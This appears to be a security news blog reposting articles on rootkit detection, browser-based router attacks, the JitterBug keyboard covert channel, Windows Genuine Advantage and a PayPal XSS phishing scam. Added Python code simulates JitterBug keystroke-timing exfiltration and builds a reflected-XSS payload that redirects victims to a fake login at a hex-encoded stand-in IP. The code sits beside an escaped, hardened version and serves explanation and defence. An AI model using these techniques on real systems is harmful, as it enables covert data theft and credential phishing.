Sophos Offers Free Rootkit Detection Tool

March 8, 2008 – 6:36 PM

There’s a new free tool to help PC users root out rootkits. Called Sophos Anti-Rootkit, the software from Sophos will detect and remove both known and unknown rootkits, and it will also warn system administrators if removing the software might harm operating system integrity.

Rootkits are collections of tools that attackers install on a machine they have already compromised in order to keep administrative access and conceal their presence. They are typically used to hide other forms of malware–keyloggers or Trojan horse programs, for example–from antivirus software and from the operating system’s own file and process listings.

Rootkits Hit the Big Time

Late last year, Sony BMG Music Entertainment helped to make rootkit a household word, after the company was forced to recall millions of CDs that used these cloaking techniques to hide its copy protection software. Sony’s rootkit, which was installed when customers played the CDs on a Windows PC, actually compromised PC security. Hackers eventually released malicious software that used Sony’s cloaking software to hide itself on a PC.

Sophos Anti-Rootkit works with the Windows NT, 2000, XP, and Windows Server 2003 operating systems. The software features a graphical interface to help guide users through the process of detecting and removing the malicious software.

Since the Sony fiasco, the security industry has paid more attention to the rootkit problem and there are now a number of free utilities designed to identify this type of software. Other tools include RootkitRevealer, GMER and IceSword.

http://www.pcworld.com/article/126897-1/article.html?tk=nl_dnxnws

Detecting, Analyzing, and Exploiting Intranet Applications using JavaScript

March 8, 2008 – 6:35 PM

Imagine visiting a blog on a social site or checking your email on a portal like Yahoo’s Webmail. While you are reading the Web page, JavaScript code is downloaded and executed by your Web browser. It scans your entire home network, detects your Linksys router and determines its model number, and then sends commands to the router to turn on wireless networking and turn off all encryption. Now imagine that this happens to 1 million people across the United States in less than 24 hours.

This scenario is no longer one of fiction.

Source: http://www.spidynamics.com/spilabs/education/articles/JS-portscan.html

Could Your Keyboard Spy on You?

March 8, 2008 – 6:34 PM

Researchers say that small devices called “JitterBugs” could piggyback onto network connections to discreetly send passwords and other sensitive data over the Internet.

Like the current keylogger hardware used by the FBI and criminals alike to record passwords and other data, JitterBugs are small devices that attach to a keyboard and record what users type. Unlike current keyloggers, which store the data to internal memory, JitterBugs do not have to be retrieved before captured data can be read.

Although no such device has been found “in the wild” yet, researchers have developed a working prototype, and they postulate that similar ideas may have already been used in unnoticed attacks.

Researchers Theorize

In a paper titled “Keyboards and Covert Channels,” University of Pennsylvania grad students explain that the device could encode data in keystrokes by introducing an extra delay between when a key is pressed and when the keyboard tells the computer that the key has been pressed.

In applications such as telnet and remote desktop, a packet is sent every time a user presses a key. By causing calculated “jitters” in keyboard input while such a program is running, a JitterBug could slightly delay data sent over the network. Certain amounts of delay could represent a 1 or a 0 in each packet that is linked to keyboard use, allowing an attacker to send secret information in otherwise innocuous data without modifying software or initiating any new connections.

Although 1 bit per packet is not a great deal of space, an application like telnet could send enough packets to transmit a password or another small, important piece of data.

To intercept this data, a spy would need to use a packet sniffer to intercept a connection from the target computer. This would require that the attacker have access to a network somewhere between the victim and the victim’s destination–not a trivial goal, but probably easier than attaching the JitterBug in the first place.

Even if the connection were encrypted, the data encoded in the delays would still be visible to an attacker: encryption protects the contents of each packet, not the time at which it is sent. Although network delays could distort the pattern introduced by the JitterBug, the encoding tolerates a bounded amount of such jitter.
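As an added illustration (not code from the paper or from the original article), the timing channel described above can be simulated in a few lines of Python. It assumes a timing window w of 20 ms, the encoding rule that the gap between forwarded keystrokes, taken modulo w, lands on 0 for a ‘0’ bit and on w/2 for a ‘1’ bit, and a constructed typing session with random inter-keystroke gaps; the network jitter it injects is likewise simulated.

```python
"""JitterBug-style timing covert channel: one bit per keystroke packet,
encoded by nudging the inter-packet delay, decoded from packet timestamps."""
import random

WINDOW_MS = 20.0   # timing window w in ms (assumed value; the real device tunes this)


def text_to_bits(text):
    return ''.join(format(b, '08b') for b in text.encode('ascii'))


def bits_to_text(bits):
    usable = len(bits) - len(bits) % 8
    return ''.join(chr(int(bits[i:i + 8], 2)) for i in range(0, usable, 8))


def jitterbug_encode(press_times, bits, window=WINDOW_MS):
    """Return the times at which the bugged keyboard forwards each keystroke.
    Keystroke i (i >= 1) is held so that its gap from the previous forwarded
    keystroke, modulo `window`, is 0 for a '0' bit or window/2 for a '1' bit.
    A keystroke is never forwarded early, and the added hold is < window."""
    out = [press_times[0]]
    for i in range(1, len(press_times)):
        earliest = max(press_times[i], out[-1])      # no reordering, no time travel
        gap = earliest - out[-1]
        if i - 1 < len(bits):                         # one bit per forwarded packet
            target = 0.0 if bits[i - 1] == '0' else window / 2
            gap += (target - gap % window) % window   # 0 <= added delay < window
        out.append(out[-1] + gap)
    return out


def jitterbug_decode(arrival_times, n_bits, window=WINDOW_MS):
    """Recover bits from sniffed packet timestamps: classify each gap mod
    window by whichever of {0, window/2} is nearer on the circle."""
    bits = []
    for i in range(1, min(len(arrival_times), n_bits + 1)):
        r = (arrival_times[i] - arrival_times[i - 1]) % window
        d0 = min(r, window - r)          # circular distance to 0
        d1 = abs(r - window / 2)         # distance to window/2
        bits.append('0' if d0 <= d1 else '1')
    return ''.join(bits)


def add_network_jitter(times, max_jitter_ms, rng):
    """Perturb each timestamp independently (simulated network jitter).
    Decoding survives while the per-gap error (up to 2*max_jitter) < window/4."""
    return [t + rng.uniform(-max_jitter_ms, max_jitter_ms) for t in times]


def simulate(secret='pw', max_jitter_ms=2.0, seed=1):
    """End to end: type `secret` bits into a constructed session, sniff with
    jitter, decode. Returns (sent_bits, recovered_bits, recovered_text)."""
    rng = random.Random(seed)
    bits = text_to_bits(secret)
    # Constructed typing session: len(bits)+1 keystrokes, 80-300 ms apart,
    # i.e. far more than one window between keys.
    press = [0.0]
    for _ in range(len(bits)):
        press.append(press[-1] + rng.uniform(80, 300))
    sent = jitterbug_encode(press, bits)
    seen = add_network_jitter(sent, max_jitter_ms, rng)
    recovered = jitterbug_decode(seen, len(bits))
    return bits, recovered, bits_to_text(recovered)


if __name__ == '__main__':
    sent_bits, got_bits, text = simulate()
    print(sent_bits, got_bits, text, sep='\n')
```

The decoder needs nothing but the packet timestamps a sniffer on the path would see; it stays correct as long as the timing error on each gap is below w/4 (here up to ±4 ms against a 5 ms margin). Raising w buys more jitter tolerance at the cost of a larger, potentially noticeable hold on each keystroke, which is why the tolerance the researchers mention is a tunable property rather than a fixed one.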

Worked Great in Tests

Researchers say that in tests, the JitterBug was able to transmit data from the University of Pennsylvania to the National University of Singapore fairly reliably.

Researchers believe that such devices could pose a security threat not only because they are difficult to detect and they work across a wide variety of software and hardware, but also because they could be inconspicuously deployed on a large scale.

In what the paper’s authors term a “supply chain attack,” manufacturers would build a JitterBug into their keyboards. Such a vulnerability would be extremely difficult to detect–neither the keyboard nor the victim’s computer would appear to be doing anything unusual–but anyone who knew of the devices could decode the data they sent, getting backdoor access to thousands of computers.

This threat, however far-fetched, seems particularly relevant in light of the U.S. government’s decision in May to use computers built by Lenovo only for processing unclassified data. The Chinese government owns 28 percent of Lenovo, a fact that sparked fears of espionage. As it turns out, numerous keyboards are also manufactured in China.

http://www.pcworld.com/article/126680-1/article.html?tk=nl_dnxnws

Does Microsoft’s Windows Genuine Advantage Program Qualify as Spyware?

March 8, 2008 – 6:33 PM

If it looks like spyware, acts like spyware, and transmits information like spyware, it’s practically spyware. That is what some antispyware makers say of the antipiracy features in Microsoft’s controversial Windows Genuine Advantage (WGA) program.

Other antispyware firms aren’t so concerned. “Microsoft has every right to protect itself from piracy,” says J.J. Schoch, director of marketing at Panda Software.

Generally, spyware is defined as unwanted software that collects information about a computer user and/or the PC itself and transmits it back to the software publisher without informed consent by the computer user.

The WGA antipiracy program works in conjunction with Windows Update to check whether the Windows operating system on a machine has a valid license. Two class-action lawsuits have been filed against Microsoft in recent weeks alleging that WGA is spyware.

Background

When introduced last year, WGA, which checks a user’s copy of Windows XP to ensure it is not counterfeit or pirated, ran only when a user fetched updates through Windows Update or the company’s Automatic Updates feature.

In April, Microsoft updated WGA, which is still a pilot program, with a Notifications tool that checked the legitimacy of Windows on a system, regardless of whether the Update services were being used. Microsoft agreed to revise Notifications in late June. The company now says the software will check only periodically (not daily) as to whether a version of Windows is genuine.

For more background on WGA, WGA Notifications, Microsoft updates to the program, information on the wording of the software’s EULA agreement, and several ways to remove the WGA Notifications tool, read PC World Staff Editor Erik Larkin’s take on these topics.

Firewall Leak Tester also offers a download that should remove the WGA Notifications tool from your PC.

Pros and Cons

Some antispyware vendors say controversial features of the WGA service are prompting them to consider putting it on their companies’ spyware blacklists, while other firms in the same business say recent hysteria over the program and lawsuits like the one filed in Seattle are without merit.

“WGA was indistinguishable from other seedy spyware firms in the Caribbean that steal data off your PC without proper permissions,” says Eric Howes, director of malware research at antispyware software maker Sunbelt Software. The firm does not currently classify WGA as spyware, but Howes says a change in status for WGA is under consideration. He acknowledges that Microsoft has since responded to the public outcry and done a better job of informing consumers about what WGA is and what information it collects.

Panda’s Schoch, on the other hand, says that the consumer uproar over WGA is somewhat confusing to him. He points out that the same people who don’t trust Microsoft’s WGA features are willing to entrust Microsoft programs with large amounts of personal data. “After they’ve trusted Windows with their personal e-mail and tax information, now they are worried about an innocent file check over the Internet?” he asks.

Microsoft acknowledges that WGA collects hardware and software data but maintains that the data is used only to verify that one copy of an OS has been registered on one computer.

Bad Guys Getting Involved

Schoch points out some cybercrooks are now distributing a worm masked as Microsoft’s WGA through America Online’s popular AIM instant messaging service. These are the threats that currently top his list of WGA concerns.

Panda and other security firms also are warning the public of the worm that is disguising itself as WGA features in Windows. The worm is capable of disabling a PC’s firewall and leaving the system vulnerable to outside control.

Other Concerns About WGA

Other WGA-focused security concerns come from antispyware firm Webroot Software, which says that systems that do not pass WGA validation are not eligible for important Windows security updates and Microsoft security features like Windows’ firewall.

“Pirated or not, a computer that is blocked from security updates and features makes the entire Internet more dangerous for all,” says Vinay Goel, vice president of worldwide marketing. That’s because cybercrooks can more easily exploit nonsecure PCs to distribute spam, viruses, and worms and also to carry out cyberattacks.

In an informal test on an unvalidated copy of Windows XP Pro, PC World could not download Service Pack 2, a security update, through Windows Update.

An antispyware expert for SurfControl says that the practice of having programs make stealthy communications back to software publishers is here to stay and will only grow more prevalent as software continues to be sold as a service rather than a shrink-wrap software product.

“Programs need to communicate back home, whether it’s for a software update, patch, upgrade, or to check to make sure that the version being used is bought and paid for,” says Jim Murphy, SurfControl’s vice president of product marketing.

Better Communication Helpful

The one area in which antispyware firms are in agreement is that Microsoft implemented WGA poorly, and has not done a good job of obtaining the clear consent of its users.

Sunbelt’s Howes gives Microsoft a grade of D- when it comes to obtaining users’ consent for WGA. He contends that by Microsoft’s own spyware definitions in its antispyware software Windows Defender, WGA would be considered spyware. “Microsoft needs to realize the rules also apply to Microsoft,” Howes says.

A spokesperson for antispyware vendor Seriniti agrees. Lawrence Phipps says Seriniti doesn’t consider WGA spyware, but says that “if it walks like a duck, and talks like a duck, you might as well call it a duck.”

http://www.pcworld.com/news/article/0,aid,126387,tk,nl_dnxnws,00.asp

PayPal Security Flaw allows Identity Theft

March 8, 2008 – 6:32 PM

A security flaw in the PayPal web site is being actively exploited by fraudsters to steal card numbers and other personal information belonging to PayPal users. The issue was reported to Netcraft today via our anti-phishing toolbar. The scam works quite convincingly, by tricking users into accessing a URL hosted on the genuine PayPal web site. The URL uses SSL to encrypt information transmitted to and from the site, and a valid SSL certificate for paypal.com is presented (the browser reports a 256-bit encrypted session), confirming that the site does indeed belong to PayPal; however, some of the content on the page has been modified by the fraudsters via cross-site scripting (XSS).

When the victim visits the page, they are presented with a message that has been injected into the genuine PayPal site that says, “Your account is currently disabled because we think it has been accessed by a third party. You will now be redirected to Resolution Center.” After a short pause, the victim is then redirected to an external server, which presents a fake PayPal Member Log-In page. At this crucial point, the victim may be off guard: the paypal.com domain name and SSL certificate he saw previously are likely to have convinced him that he was on the genuine PayPal web site, and why would he expect PayPal to redirect him to a fraudulent web site?

If the victim logs in via the fake login page, their PayPal username and password are transmitted to the fraudsters, and they are then presented with another page that asks for further details to remove limits on their account. Information requested includes social security number, credit card number, expiration date, card verification number and ATM PIN. The server currently running the scam is hosted in Korea and is accessed via a hex-encoded IP address. The Netcraft Toolbar already protects PayPal users by blocking access to this site.
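The injection step can be illustrated with a minimal page that reflects a query parameter into its HTML, shown beside the hardened version that escapes the value first. This is an added example, not PayPal’s code and not the actual flaw: the page template, the parameter name msg, the example.com path standing in for the genuine hostname, and the payload (modelled on the message quoted above, ending in a scripted redirect to a hex-encoded IP) are all constructed here.

```python
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed template standing in for a site page that reflects a parameter.
PAGE = "<html><body><h1>Account status</h1><p>{msg}</p></body></html>"


def _param(url, name):
    """First value of query parameter `name` in a full URL, or '' if absent."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(url):
    # Reflected XSS: attacker-controlled text lands in the HTML unchanged,
    # so any <script> it carries runs in the genuine site's origin.
    return PAGE.format(msg=_param(url, "msg"))


def render_hardened(url):
    # Escape for the HTML text context before insertion. quote=True also
    # neutralises the value inside attributes, should the template change.
    return PAGE.format(msg=html.escape(_param(url, "msg"), quote=True))


# Constructed payload modelled on the scam: a reassuring message, then a
# scripted redirect after a pause. 0x7F000001 is 127.0.0.1 written as a
# hex-encoded IP, used here as a stand-in for the fraudsters' server.
PAYLOAD = (
    "Your account is currently disabled because we think it has been accessed "
    "by a third party. You will now be redirected to Resolution Center."
    "<script>setTimeout(function(){location='http://0x7F000001/login'},4000)</script>"
)


def attack_url(base="https://www.example.com/status"):
    """Build the link the fraudsters would circulate. Hostname, path and the
    certificate the browser checks all belong to the genuine site; only the
    query string is attacker-controlled."""
    return base + "?" + urlencode({"msg": PAYLOAD})


def has_script(page_html):
    """Crude check for whether active content reached the rendered page."""
    return "<script" in page_html.lower()


if __name__ == "__main__":
    link = attack_url()
    print(link)
    print("vulnerable renders script:", has_script(render_vulnerable(link)))
    print("hardened renders script:  ", has_script(render_hardened(link)))
```

The escaped version turns the injected tag into literal text (&lt;script&gt;), so the victim sees gibberish rather than being redirected; the padlock and domain name are unchanged in both cases, which is exactly why the browser’s certificate check offers no defence against this class of flaw.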

UPDATE: PayPal has now addressed this vulnerability. A company spokesman said PayPal is working with the Internet service provider that hosts the malicious site to get it shut down, and does not yet know how many people may have fallen victim to the scam.

http://news.netcraft.com/archives/2006/06/16/paypal_security_flaw_allows_identity_theft.html